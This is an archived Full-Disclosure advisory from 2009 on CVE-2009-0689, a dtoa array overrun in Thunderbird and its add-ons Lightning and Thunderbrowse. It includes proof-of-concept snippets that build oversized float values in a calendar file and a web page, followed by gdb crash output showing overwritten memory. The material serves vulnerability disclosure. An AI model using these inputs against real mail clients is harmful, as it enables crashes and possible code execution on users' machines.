lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 11 Dec 2009 00:46:48 +0100
From: Maksymilian Arciemowicz <>
Subject: SecurityReason: Thunderbird (lib) Remote
 Array Overrun (Arbitrary code execution)

[ Thunderbird (lib) Remote Array Overrun (Arbitrary code
execution) ]

Author: Maksymilian Arciemowicz and sp3x
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Thunderbird

Fixed in:
- Thunderbird 3.0
- Thunderbird

NOTE: Prior versions may also be affected.

Original URL:

--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it?s easier to prioritize and find your important
email with tags and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.

--- 1. Thunderbird (lib) Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. Thunderbird has the same
dtoa as Firefox, etc. This problem affects many additional Add-ons for

Example for affected Add-ons:
- Lightning 0.9
- Thunderbrowse
- more

and it is the same like SREASONRES:20090625.

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.

--- 2. Proof of Concept  (PoC) ---

(PoC for Lightning )
# sp3x
# tested on WinXp SP3

my $header = "BEGIN:VCALENDAR\n".
"PRODID:-// Mozilla Calendar V1.1//EN\n".
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".

print myfile $header.$s.$expl.$footer;

(PoC for Thunderbrowse )
var a=0.<?php echo str_repeat("1",333333); ?>;

When we use Thunderbrowse to see this site, Thunderbird will crash with:

Program terminated with signal 11, Segmentation fault.
#0  0xbb15d1e7 in ?? ()

eax            0x0      0
ecx            0xa      10
edx            0x0      0
ebx            0xbb16eb38       -1156125896
esp            0xbfbfce58       0xbfbfce58
ebp            0xbfbfce74       0xbfbfce74
esi            0xb      11
edi            0xb768e700       -1217861888
eip            0xbb15d1e7       0xbb15d1e7
eflags         0x282    [ SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0xab     171
gs             0xb3     179

(gdb) x/x ($eip)
0xbb15d1e7:     Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb:    Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700:     0x1c71c71c

now esi=0xb and edi=0x1c71c71c

(gdb) x/20x ($edi)
0xb768e700:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb768e710:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0xb768e720:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0xb768e730:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb768e740:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7

(gdb) x/50x ($edi)+37000
0xb7697788:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0xb7697798:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0xb76977a8:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb76977b8:     0xc71c71c7      0x71c71c71      0x1c71c71c      0xc71c71c7
0xb76977c8:     0x71c71c71      0x1c71c71c      0xc71c71c7      0x71c71c71
0xb76977d8:     0x1c71c71c      0xc71c71c7      0x71c71c71      0x1c71c71c
0xb76977e8:     0xc71c71c7      0x91c71c71      0x0b76d741      0x1af63420
0xb76977f8:     0x7c6568c4      0xd74952a1      0x552d1c87      0x4018081a
0xb7697808:     0xcb313ca6      0xd16c5484      0x36d13467      0x130c4b7d
0xb7697818:     0x92c1d06c      0xf70d9591      0x56bea87c      0x7c7bcc44
0xb7697828:     0xe6dd415d      0x210c53a8      0x482d162b      0x6d39c1c9
0xb7697838:     0x478f5fb2      0x9d6a2f46      0xe8b20d52      0xb012aa49
0xb7697848:     0xd75822f6      0x83ebbe5a

--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.

--- 4. Fix ---
NetBSD fix (optimal):

OpenBSD fix:

--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from

--- 6. Greets ---
Infospec p_e_a pi3

--- 7. Contact ---
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com


Download attachment "signature.asc" of type "application/pgp-signature" (164 bytes)

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists